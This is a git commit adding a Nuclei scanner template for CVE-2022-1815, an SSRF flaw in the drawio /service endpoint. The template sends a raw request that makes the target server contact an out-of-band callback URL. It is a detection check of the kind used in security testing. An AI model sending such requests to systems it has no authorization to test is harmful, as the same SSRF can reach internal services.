Create CVE-2022-1815
parent
1cb4a74be1
commit
b359fb30a9
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2022-1815
|
||||
|
||||
info:
|
||||
name: jgraph/drawio - Server Side Request Forgery
|
||||
author: amit-jd
|
||||
severity: medium
|
||||
description: SSRF in /service endpoint in jgraph/drawio pripr to 18.1.2
|
||||
reference:
|
||||
- https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/
|
||||
tags: cve,cve2022,drawio,jgraph,ssrf
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /service/0/{{interactsh-url}} HTTP/2
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
Loading…
Reference in New Issue